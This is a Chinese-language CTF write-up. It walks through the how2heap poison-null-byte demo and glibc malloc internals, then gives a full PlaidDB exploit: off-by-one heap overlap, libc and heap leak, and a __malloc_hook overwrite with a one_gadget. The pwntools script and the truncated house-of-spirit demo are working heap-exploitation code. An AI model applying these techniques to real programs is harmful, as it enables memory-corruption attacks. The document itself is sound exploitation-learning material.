 * byte written one past the usable end of a clears the low byte of b's size
 * field. Two smaller chunks b1 and b2 are carved out of the shrunken b; since
 * c.prev_size is not updated, freeing b1 and then c consolidates across b2,
 * and the final allocation d overlaps b2. Every step is printed to stderr.
 */
int main()
{
    fprintf(stderr, "Welcome to poison null byte 2.0!\n");
    fprintf(stderr, "Tested in Ubuntu 14.04 64bit.\n");
    fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
    fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

    uint8_t* a;
    uint8_t* b;
    uint8_t* c;
    uint8_t* b1;
    uint8_t* b2;
    uint8_t* d;
    void *barrier;

    fprintf(stderr, "We allocate 0x100 bytes for 'a'.\n");
    a = (uint8_t*) malloc(0x100);
    /* %p requires a void * argument, hence the explicit casts below. */
    fprintf(stderr, "a: %p\n", (void *)a);
    int real_a_size = malloc_usable_size(a);
    fprintf(stderr, "Since we want to overflow 'a', we need to know the 'real' size of 'a' "
            "(it may be more than 0x100 because of rounding): %#x\n", real_a_size);

    /* chunk size attribute cannot have a least significant byte with a value of 0x00.
     * the least significant byte of this will be 0x10, because the size of the chunk includes
     * the amount requested plus some amount required for the metadata. */
    b = (uint8_t*) malloc(0x200);

    fprintf(stderr, "b: %p\n", (void *)b);

    c = (uint8_t*) malloc(0x100);
    fprintf(stderr, "c: %p\n", (void *)c);

    barrier = malloc(0x100);
    fprintf(stderr, "We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.\n"
            "The barrier is not strictly necessary, but makes things less confusing\n", barrier);

    uint64_t* b_size_ptr = (uint64_t*)(b - 8);

    // added fix for size==prev_size(next_chunk) check in newer versions of glibc
    // https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30
    // this added check requires we are allowed to have null pointers in b (not just a c string)
    fprintf(stderr, "In newer versions of glibc we will need to have our updated size inside b itself to pass "
            "the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
    // we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
    // which is the value of b.size after its first byte has been overwritten with a NULL byte
    *(size_t*)(b+0x1f0) = 0x200;

    // this technique works by overwriting the size metadata of a free chunk
    free(b);

    fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
    fprintf(stderr, "b.size is: (0x200 + 0x10) | prev_in_use\n");
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
    fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);

    uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
    fprintf(stderr, "c.prev_size is %#lx\n",*c_prev_size_ptr);

    // This malloc will result in a call to unlink on the chunk where b was.
    // The added check (commit id: 17f487b), if not properly handled as we did before,
    // will detect the heap corruption now.
    // The check is this: chunksize(P) != prev_size (next_chunk(P)) where
    // P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
    // next_chunk(P) == b-0x10+0x200 == b+0x1f0
    // prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
    fprintf(stderr, "We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
            *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
    b1 = malloc(0x100);

    fprintf(stderr, "b1: %p\n", (void *)b1);
    fprintf(stderr, "Now we malloc 'b1'. It will be placed where 'b' was. "
            "At this point c.prev_size should have been updated, but it was not: %#lx\n",*c_prev_size_ptr);
    fprintf(stderr, "Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
            "before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
    fprintf(stderr, "We malloc 'b2', our 'victim' chunk.\n");
    // Typically b2 (the victim) will be a structure with valuable pointers that we want to control

    b2 = malloc(0x80);
    fprintf(stderr, "b2: %p\n", (void *)b2);

    memset(b2,'B',0x80);
    fprintf(stderr, "Current b2 content:\n%s\n",b2);

    fprintf(stderr, "Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");

    free(b1);
    free(c);

    fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2'.\n");
    d = malloc(0x300);
    fprintf(stderr, "d: %p\n", (void *)d);

    fprintf(stderr, "Now 'd' and 'b2' overlap.\n");
    memset(d,'D',0x300);

    fprintf(stderr, "New b2 content:\n%s\n",b2);

    /* The second literal starts with a space so the URL and "for" do not run together. */
    fprintf(stderr, "Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks"
            " for the clear explanation of this technique.\n");
}

大致意思如下:程序首先malloc了四个small chunk(这里我写的是实际大小)接着进行如下操作:

0x110(a) 0x210(b) 0x110(c) 0x110(barrier)

  1. 在b chunk的0x200偏移处写上了0x200
  2. free(b),设置c.prev_size=0x210,c.size=0x110(此时b chunk被置入unsorted bin)
  3. 通过a的溢出将b.size由0x211改为0x200
  4. b1=malloc(0x100),将b分割出b1(如果不在之前设置fake prev_size,分割时调用unlink会出错)
  5. b2=malloc(0x80)//victim chunk
  6. free(b1)b1被free之后在下一步free(c)时即可通过unlink的检查FD->bk != P || BK->fd != P
  7. free(c),由于c.prev_size在之前被设置成了0x210,c.size为0x110,所以这个free会将前0x210size的chunk一起合并
  8. d=malloc(0x300),此时d与b2 overlap

debug

debug的时候实在是受不了pwndbg里面heap的非hex显示了,于是自己去改了一下pwndbg的脚本(然后被安利了pwngdb和pwndocker,准备这个题写完就去看看)

在pwndbg/pwndbg/commands目录下的heap.py文件里面,找到malloc_chunk函数,然后替换一下注释掉的那行即可:

1
2
3
4
5
6
# Replacement for the default chunk dump: print the header fields in hex,
# two per row, instead of printing the raw gdb.Value.
#print(header, chunk["value"])
print(header,'{')
print(' prev_size = '+hex(chunk['prev_size']).ljust(15,chr(0x20)),'size = '+hex(chunk['size']))
print(' fd = '+hex(chunk['fd']).ljust(15,chr(0x20)),'bk = '+hex(chunk['bk']))
print(' fd_nextsize = '+hex(chunk['fd_nextsize']).ljust(15,chr(0x20)),'bk_nextsize = '+hex(chunk['bk_nextsize']))
print('}')

gdb.Value object里面的直接打印的话是十进制显示的一些值,看起来没那么方便,自己可以按照喜欢的格式改一下脚本

第3步执行之后:

1581064511575

ps:这里可以看出来pwndbg的heap显示是根据堆上的size偏移来计算chunk地址的,所以修改size之后会出现这种错位的现象

第5步执行之后:

第6步执行之后:

b1会被再次放入unsorted bin当中,此时b1是在正常bin链上,当然也具备unlink检查的条件

ps:注意第7步执行之后,本来是unlink了b1这个堆块,但是free时会把合并后的堆块再放入unsortedbin,所以在gdb下查看第七步执行之后的bins中unsortedbin是没有变的(毕竟b1和b的首地址是一样的)

第8步执行过程

我调试了很久很久,主要是搭了glibc源码的调试环境然后撸了很久的malloc源码

因为在第八步执行前heap上和chunk的情况是这样的:

但是执行之后变成了这样:

小的被分割出来的chunk被放入了smallbins,然后malloc(0x300)返回出来的chunk是合并后0x320字节的chunk,照理来说应该是0x310才对,如果是对0x320的chunk进行了切割,剩下的0x10字节是<MINSIZE的,所以得看分配时是不是发生了哪种fit,最后在撸了源码之后,参考xman师傅发的堆ppt看到了这个(不愧是师傅们的总结,tql),不过师傅们的总结这里,unsorted bin大小满足分配需求、剩余大小<MINSIZE时在我这里似乎并不是直接取,因为我撸源码时,里面判断>MINSIZE不成立时直接就把unsortedbin中最后一个块取下来了。

1581133887238

ps:再就是直接从unsortedbin取chunk要满足上图中未打框的四个条件,这里在第4步malloc(0x100)分割出b1,实际上不是从unsortedbin b直接切出来的,是先把这个chunk放入了对应的smallbins,然后再从smallbins切出来的,剩下的块由于大于MINSIZE,所以再被链入了unsortedbin,此时last_remainder才被初始化(对应剩下的块),看上去b1好像是直接从unsortedbin b直接切出来的实际上不是(所以这里再立个 flag,自己找时间把malloc的全流程稍微详细的写一遍),所以我发现分割之后的两个chunk中fd和bk不一样,如下(last_remainder也在第一次分割chunk后初始化):

1581152010623

如上,首先被链入smallbins

回到第八步,ptmalloc源码分析那本PDF里面也写到了best-fit相关:

此时从对应smallbins中对应下标(0x310->0x31)的下一个下标(0x320->0x32)开始找,这里补一个binmap的知识点

binmap&一些流程

在x64下binmap同样是4个Dword(4*32)

利用binmap找到best-fit chunk的具体代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* Excerpt: scan the binmap for the next non-empty bin that can serve the
   request. `block` indexes a word of av->binmap, `map` is that word and
   `bit` selects one bin inside it. */
for (;;) {
    /* Skip rest of block if there are no more set bits in this block. */
    if (bit > map || bit == 0) {
        /* No bin at or above `bit` is marked in this word: step through the
           following words until a non-zero one is found, or fall back to the
           top chunk once every word has been visited. */
        do {
            if (++block >= BINMAPSIZE) /* out of bins */
                goto use_top;
        } while ( (map = av->binmap[block]) == 0);
        /* Restart at the first bin of the word that was found. */
        bin = bin_at(av, (block << BINMAPSHIFT));
        bit = 1;
    }

    /* Walk the bins of this word until one whose bit is set in `map`; that
       bin is marked as holding free chunks. */
    while ((bit & map) == 0) {
        bin = next_bin(bin);
        bit <<= 1;
        assert(bit != 0);
    }
    /* Candidate: the last chunk of that bin. */
    victim = last(bin);
    /* ... the rest of the loop body is not part of this excerpt ... */
}

然后接下来就是一些分配流程

  • 如果 victim 与 bin 链表头指针相同,表示该 bin 中没有空闲 chunk, binmap 中的相应位设置不准确,将 binmap 的相应 bit 位清零, 获取当前 bin 下一个 bin,将 bit 移到下一个 bit位,即乘以 2。
  • 当前 bin 中的最后一个 chunk 满足要求,获取该 chunk 的大小,计算切分出所需 chunk
    后剩余部分的大小,然后将 victim 从 bin 的链表中取出。
    • 如果剩余部分的大小小于 MINSIZE,将整个 chunk 分配给应用层,设置 victim 的状态为inuse,如果当前分配区为非主分配区,设置 victim 的非主分配区标志位。 (这里就是我们0x320的chunk最终被返回的原因)
    • 否则从 victim 中切分出所需的 chunk,剩余部分作为一个新的 chunk 加入到 unsorted bin 中。如果剩余部分 chunk 属于 small bins,将分配区的 last remainder chunk 设置为剩余部分构成的 chunk; 如果剩余部分 chunk 属于 large bins,将剩余部分 chunk 的 chunk size 链表指针设置为 NULL,因为 unsorted bin 中的 chunk 是不排序的,这两个指针无用,必须清零
      • 接着设置 victim 和 remainder 的状态,由于 remainder 为空闲 chunk,所以需要设置该 chunk
        的 foot。

如果以上的分配都没有成功最后就会去寻找top_chunk

这里找到一个ptmalloc简单点的总结:

  1. 在fastbin中寻找有没有对应的chunk
  2. 请求大小为small bin范围,在small bin中寻找有没有对应的chunk
  3. 请求大小为large bin范围,仅调用malloc_consolidate合并fastbin
  4. 在unsorted bin中寻找有没有合适的chunk
  5. 在large bin中寻找有没有合适的chunk
  6. 寻找较大的bin链中有没有合适的chunk
  7. 寻找top_chunk
  8. top_chunk不够用,调用malloc_consolidate合并fastbin
  9. top_chunk不够用,系统调用再次申请内存

原文链接:https://zhuanlan.zhihu.com/p/77316206

plaiddb

程序分析

打开IDA茫茫一片23333,然后自己先去把这个程序跑了一下,了解了一下大致的功能,看能不能先理出一点逆向思路来

暂时理解的大概意思就是:GET是获取一个row的内容,PUT是放入一个新的row,DUMP是打印rows的信息,DEL是删除一个row,EXIT就是退出了。

接下来再来分析代码

因为这个函数里面的运算比较多,而且第一次进去也就是做了一些初始化,所以我就先慢慢分析下面的真正菜单


Two hours later…..


….逆锤子?结果还是要回到sub_CF0??….两百多行的函数配着循环和goto,快把我给逆疯了好嘛….(wtcl…)

我先是逆出了一个结构体的样子(查了wp发现我这个结构体也还稍微有点问题,0x30处的应该是一个leaf or not的flag标识,我刚开始还以为它代表是否为根节点,不过bss段上存的那个变量应该是根节点指针):

1581237156090

是的,我是在里面一次次调试尝试加上静态分析之后才发现这个数据库是用树形结构来实现的,限于数据结构的水平和逆向的代码量….我没有逆出来具体是哪种树,发现是树形结构之后为了不太浪费时间就放弃了逆向…转而查了WP(pwn这边果然是任重而道远啊)

PUT

  • 先申请一个0x40的chunk作为结点
  • 在Enter里面申请一个0x20的chunk存储这个结点的row key
  • 然后再申请一个我们可以控制大小的chunk来存储data
    • 如果申请失败就free掉前两个chunk
  • data chunk申请成功,通过freadn来输入data,并尝试将这个结点加入red-black tree
  • 如果加入失败说明之前有相同的row key,树操作会返回相同row key结点的指针,成功则返回0
    • 失败:先free掉前面的row key chunk和已有结点的data chunk,接着更新已有结点的data size和data chunk指针,然后free掉前面申请的结点chunk

DUMP

  • 根据某种遍历方式,打印出所有结点的row key还有对应的data size(这里IDA打印函数的参数识别稍微有点问题)

GET

  • Enter时申请一个row key chunk,然后通过对比找到相应结点
  • 打印相应结点的data chunk内容
  • free掉前面Enter的row key chunk

DEL

茫茫一片的树操作,不过关注点只需要放在chunk的操作上即可

1581258539173

  • Enter一个row key chunk,然后查找对应的结点
    • 找到了:free对应结点的row key chunk和data chunk然后free结点、free Enter的chunk
    • 没找到:直接退出,没有free Enter的chunk

off_by_one

程序存在一个off_by_one,在Enter函数里面

当chunk_ptr_now - chunk_ptr == usable_size时,最后一步操作 *chunk_ptr_now=0会越界赋值0

Exploit

程序的流程是终于捋出来了,但是这个利用好像需要想一想,每次都是几个chunk一起操作(特别是PUT的时候),以前做的利用都比较单一,没有这么复杂。


回想一下前面的poison_null_byte.c

  • free掉两个chunk中间的一个chunk(free之前先设置一个假的prev_size来通过malloc的检查,和之前那篇里面的fake size目的是不一样的,一个是为了通过free的检查一个是为了通过malloc的检查)(free之后第三个chunk的prev_inuse位就为0了)
  • 用第一个chunk的off_by_one来影响第二个chunk的size字段
  • malloc两个小一点的chunk:b1&b2
  • free b1之后free第三个chunk,此时第三个chunk和b2 overlap

那到这个题里面应该怎么利用呢emmm…..把断点下在第一次输入完命令DUMP之后(dump执行完不会影响heap),调试看一下

1581260525230

此时堆中的chunks就是我们前面初始化的第一个结点还有对应的row key chunk和data chunk

在这些chunk里面,结点chunk还有row key chunk都是指定大小的fastchunk,只有data可以为不同的chunk,然后存在漏洞的Enter函数是只被row key chunk调用的,所以off_by_one只发生在row key chunk生成时后面紧跟着的chunk

各处的malloc(初始化之后的)

PUT中的chunk申请顺序:结点 -> row key -> data

GET中只申请了一个row key

DEL中也只有一个row key

各处的free

PUT中:

  • data申请失败会free掉PUT函数中申请的row key chunk和结点chunk
  • 输入的row key已存在时会free PUT函数中申请的row key chunk和已有结点的data chunk,还有前面的结点chunk

GET中无论如何都会free用来查找的row key chunk

DEL中:

  • 找到了:free对应结点的row key chunk、data chunk然后free结点、free Enter的chunk
  • 没找到:直接退出,没有free Enter的chunk

第一思路:

在初始化的基础上,再申请两个节点,此时堆中就会有以下结构

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 top_chunk

接着删除第二个结点

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x20 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 row key4 top_chunk
fastbin fastbin ?bin fastbin

此时0x20的fastbin中是row key4->row key2

然后通过DEL中没有free Enter chunk,申请两次,从而第二次可以在row key2处对data2造成off_by_one(既然能off_by_one,data2就肯定不是fastchunk了)

但是还有一点,off_by_one发生之后,如果我们的目的是用例子的那种overlap,这时结点3是一个fastchunk,free的时候并不会向前合并,所以这个思路显然不行

ps:然而当我写完后面的再回来看的时候,这里又是我立的一个flag,或者说我当时写到这里的时候还对构造不太熟悉,如果把两个data chunk构造在一起好像也不是不行(只要删掉前面一个结点,就会在fastbin中腾出位置来,再申请一个有大于之前data块的结点就可以了),主要是写后面的构造方法写着写着就忘了前面这个我想到的用DEL填充来off_by_one然后合并前面的chunk的方法,如果用这种方式来构造的话可以这样构造:

0x40 0x20 0x20 0x40 0x20 0xd0 0x40 0x20 0x70 0x40 0x20 0x100 0x40 0x20 0x40
结点1 rowkey1 data1 结点2 rowkey2 data2 结点3 rowkey3 data3 data5 结点5 rowkey5
fastbin2 fastbin1 fastbin2

第二思路:

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2 结点3 row key3 data3 top_chunk

还是先产生这样的结构,不过此时row key3是和row key2一样的,主要是想让结点2中的data2改到data3去,然后就会变成这样

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x??? 0x??????
结点1 row key1 data1 结点2 row key2 data2_old 结点3 row key3 data2_n top_chunk
?bin fastbin fastbin

然后接着构造(data3要大过data2_old)

0x40 0x20 0x20 0x40 0x20 0x??? 0x40 0x20 0x?00 0x??? 0x??????
结点1 rowkey1 data1 结点2 rowkey2 data2_old 结点3 rowkey3 data2_n data3 top_chunk
?bin

申请新的结点3,并在此时对data2_n构成off_by_one并写好prev_size

这里之后我去参考了一些wp,发现大家都是用的结构体前面两个成员,row key ptr还有data size进行的leak,而且对应的指针是unsortedbin指针,因为unsortedbin指针的偏移会指向top_chunk,使用这种泄露方式可以同时泄露出libc_base和heap_base,再就是how2heap中这个off_by_one是用来malloc的时候不改变下个chunk的prev_size,但是这个题用off_by_one来free合并前面的chunk似乎更简单一点

接着构造Double free,但是如果想要修改malloc hook之类的地方,我发现我不仅需要一个0x70的fastchunk(参考之前写的babyheap),还需要一个smallbin合并时用来unlink,所以得回去再重新加上(当然此时的chunk链结构就又发生了变化,保证data2_n被free时能合并前面的chunk,而且0x70chunk必须在这个smallbin之后)

计算size并更改之后:

0x40 0x20 0x20 0x40 0x20 0x90
结点1 rowkey1 data1_n
fastbin fastbin fastbin

然后一步步构造之前构造过的

0x40 0x20 0x20 0x40 0x20 0x90 0x40
结点1 rowkey1 rowkey2 结点2 data1_n data2
fastbin

然后把data2后面造成一个结点为了0x90+0x40的chunk被分割之后直接DUMP leak

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70
结点1 rowkey1 rowkey2 结点2 data1_n data2 data2_n
fastbin fastbin fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 data2_n

开始构造off_by_one

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 data2_nn
fastbin fastbin fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data4
fastbin
0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data4_n
fastbin fastbin fastbin fastbin

终于具备漏洞利用的条件了

再添加一个结点5trigger off_by_one

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110
结点1 rowkey1 rowkey2 结点2 rowkey3 data1_n data3 结点3 结点4 rowkey4 data2_nn data5 结点5 rowkey5 data4_n
fastbin

删掉结点2、1、4(这里我调试之后回来2删了,否则后面树操作好像会出错,>>>…<<<中间的是unsorted chunk)

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20
rowkey3 data3 结点3 data5 结点5 rowkey5 data4_n
fastbin fastbin fastbin fastbin >>> fastbin fastbin fastbin fastbin <<< fastbin

然后申请一个data为0xD0的块a,但是由于我申请的大小太玄学了…top_chunk结尾刚好是\x00,打印会失败,所以我又更改了data5的大小,然后就可以成功leak了,此时的堆应该是这样(这里我把同大小的fastchunk在fastbin链表上的位置通过调试标出来了最先被malloc出去的数字最大,方便后面的制表):

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
rowkey3 (a data) data3(a data) 结点3 结点a 结点5 rowkey5 data4_n rowkey a data5_n
fastbin2 fastbin2 fastbin1 fastbin1 >>> fastbin1 fastbin3 fastbin2 fastbin1 <<<

leak之后我们再申请一个data size为0xB0的chunk b,就刚好把接下来0x70和0x40这个chunk重复利用了,而0x70这个chunk在fastbin里面,只要把他的fd改到__malloc_hook上方即可(具体位置见之前写的的babyheap)

不过至于具体的data填充操作我调试了很久很久,稍不注意就会在各种地方出错,建议直接把内存全部打印出来然后照着上面的填进去,这样比较好

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
结点b rowkey3 (a data) data3(a data) 结点3(data b) (data b) 结点a rowkeyb 结点5 rowkey5 data4_n rowkey a data5_n
fastbin2 fastbin1 fastbin1 fastbin1 >>> fastbin2 fastbin1 <<<

然后我们再申请一个没有意义的c(data为0x70的fastchunk),只是为了下一次能把__malloc_hook那块内存给malloc出来

0x40 0x20 0x20 0x40 0x20 0x90 0x40 0x40 0x70 0x40 0x20 0x60 0x60 0x40 0x20 0x110 0x20 0x110
结点b rowkey c 结点c rowkey3 (a data) data3(a data) 结点3(data b) (data b)(data c) 结点a rowkeyb 结点5 rowkey5 data4_n rowkey a data5_n
fastbin1 >>> fastbin2 fastbin1 <<<

这里好像再进行申请时会出错,我删结点5好像也删不掉(显示notfound,可能是因为a被unsortedbin指针破坏,然后树结构改变了的原因),本来以为到这里就会嗝屁失败了,但是b被我成功删掉了(这可能就是玄学吧XD,希望以后不要有这种情况)

然后malloc一个0x70的chunk修改__malloc_hook

不过在PUT里面的malloc触发one_gadget死活不成功,本来以为又要嗝屁了55555,结果在我坚持尝试的努力下,在DEL中成功将one_gadget触发成功

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Target setup: start PlaidDB locally with ASLR enabled and PTYs on stdin/stdout.
binary = 'PlaidDB' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack helpers that pad short reads to the full word width; my_u64 is used
# below to decode the 6-byte heap pointer leak.
# (Template leftovers: my_u32, ub_offset and codebase are not used by this script.)
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def GET(key):
    """Issue a GET command for row `key`.

    Waits for the command prompt, sends "GET", then waits for the row-key
    prompt before sending the key.
    """
    p.recvuntil('Enter command:\n')
    p.sendline("GET")
    # recvline() takes a keepends flag, not a delimiter, so the prompt text was
    # never matched; recvuntil() really waits for it.
    p.recvuntil("PROMPT: Enter row key:")
    p.sendline(key)

def PUT(key, size, data):
    """Issue a PUT command storing `data` (declared length `size`) under `key`.

    `data` is sent with send(), i.e. without a trailing newline.
    """
    p.recvuntil('Enter command:\n')
    p.sendline("PUT")
    # recvline() takes a keepends flag, not a delimiter, so the prompt texts
    # were never matched; recvuntil() really waits for each of them.
    p.recvuntil("PROMPT: Enter row key:")
    p.sendline(key)
    p.recvuntil("PROMPT: Enter data size:")
    p.sendline(str(size))
    p.recvuntil("PROMPT: Enter data:")
    p.send(data)

def DUMP():
    """Issue a DUMP command once the command prompt appears."""
    command = "DUMP"
    p.recvuntil('Enter command:\n')
    p.sendline(command)

def DEL(key):
    """Issue a DEL command for row `key`.

    Waits for the command prompt, sends "DEL", then waits for the row-key
    prompt before sending the key.
    """
    p.recvuntil('Enter command:\n')
    p.sendline("DEL")
    # recvline() takes a keepends flag, not a delimiter, so the prompt text was
    # never matched; recvuntil() really waits for it.
    p.recvuntil("PROMPT: Enter row key:")
    p.sendline(key)

# Heap layout from the write-up. A PUT that re-uses an existing row key
# ("2222222", '4444444') swaps that node's data chunk for the new one.
PUT("th3fl4g", 0x88, '\x00'*0x88)
PUT("2222222", 0x38, '\x00'*0x38)
PUT("2222222", 0x68, '\x00'*0x68)
PUT("3333333", 0x38, '\x00'*0x38)
PUT("2222222", 0x58, '\x00'*0x58)
PUT('4444444', 0x58, '\x00'*0x58)
PUT('4444444', 0xf8, '\x00'*0xf8)
# 0x18-byte row key ending in p64(0x300): presumably this is the PUT that
# triggers the off-by-one and leaves 0x300 as the fake prev_size — confirm
# against the heap dump.
PUT('5'*0x10+p64(0x300), 0x108, '\x00'*0x108)

DEL('2222222')
DEL('th3fl4g')
DEL('4444444')

# Debugging aid: attaches gdb with a breakpoint command for offset 0x1334.
# NOTE(review): remove or comment out when running without a debugger.
gdb.attach(p,'brva 0x1334')
PUT('a', 0xc8, '\x00'*0xc8)#D0 chunk

# DUMP output is used for the leak: 6 raw bytes after '[' give a heap pointer,
# and the decimal number after ', ' gives a libc pointer.
DUMP()
#p.recvuntil('bytes')
p.recvuntil('[')
heap_base=my_u64(p.recv(6))-0x610
p.recvuntil(', ')
libc_base=int(p.recvuntil(' '))-0x3c4b78
log.info("\033[1;36m" + hex(heap_base)+','+hex(libc_base) + "\033[0m")

# Data for 'b' overlaps existing chunks: it restores two heap pointers and
# plants a 0x71-sized chunk header followed by libc_base+0x3c4aed (per the
# write-up, the forged fastbin fd just above __malloc_hook).
fill1=p64(0)*2+p64(heap_base+0x180)+p64(0)*2+p64(heap_base+0x390)+p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)+p64(0)*12
PUT('b',0xa8,fill1)

# Filler allocation so that the next 0x70-class request returns the forged chunk.
PUT('c',0x68,'no mean'.ljust(0x48,'\x00')+p64(0x200)+p64(libc_base+0x3c4b78)*2+'\x00'*8)

DEL('b')
### Write different one_gadget
# 19 bytes of padding, then the one_gadget address (overwrites __malloc_hook per the write-up).
#PUT('never',0x68,'\x00'*19+p64(libc_base+0x45216)+'\x00'*77)
PUT('gogogo',0x68,'\x00'*19+p64(libc_base+0x4526a)+'\x00'*77)
#PUT('never',0x68,'\x00'*19+p64(libc_base+0xf02a4)+'\x00'*77)
#PUT('never',0x68,'\x00'*19+p64(libc_base+0xf1147)+'\x00'*77)

# The write-up reports that the gadget fires from DEL, not from PUT.
DEL('gogogo')
#GET('')

p.interactive()

小记

这个堆题应该是目前为止写的时间最长,也是最麻烦的一个堆题,主要是树形结构的逆向很耗时间,然后在off_by_one的构造上也要花不少功夫,合并的内存块前面必须要满足unlink条件,这个就需要精力去考虑一下在这种复杂堆管理下的构造方式,再就是一定要清楚各个模块对chunk操作的顺序,否则写起来真的毫无头绪。再就是这个leak的方式也是我第一次见,通过unsortedbin指针,既打印了libc的地址又打印了堆的地址,承认这个操作是看师傅们的wp来的,以后一定在leak方面加把劲XD。最后就是玄学树操作,比赛碰到这种一定要不求甚解,只要能不影响漏洞利用就可以了,要不然浪费大量时间。
另外这题师傅们的构造更好一点,师傅们的构造是这样的,0x90加到0x100 chunk之前刚好是0x200的一个chunk

node A dataB rkB rkA dataA nodeB nodeC rkC nodeD rkd(exp) dataC_n dataD
0x40 0x20 0x20 0x20 0x90 0x40 0x40 0x20 0x70 0x40 0x20 0x100 0x20
fastbin1

最后:多撸源码

how2heap - house_of_spirit&OREO

ubuntu 16.04 libc2.23

house_of_spirit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>

/*
 * House-of-spirit demonstration.
 *
 * A fake fastbin-sized chunk is laid out in the stack array fake_chunks
 * (size field at index 1, the next chunk's size field at index 9), a pointer
 * into it is passed to free(), and the following malloc(0x30) is printed so
 * the returned address can be compared with the fake region.
 */
int main()
{
    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    /* sizeof yields a size_t, which is printed with %zu; %p requires void *. */
    fprintf(stderr, "This region (memory of length: %zu) contains two chunks. The first starts at %p and the second at %p.\n",
            sizeof(fake_chunks), (void *)&fake_chunks[1], (void *)&fake_chunks[9]);

    fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

    fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
    // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
    fake_chunks[9] = 0x1234; // nextsize

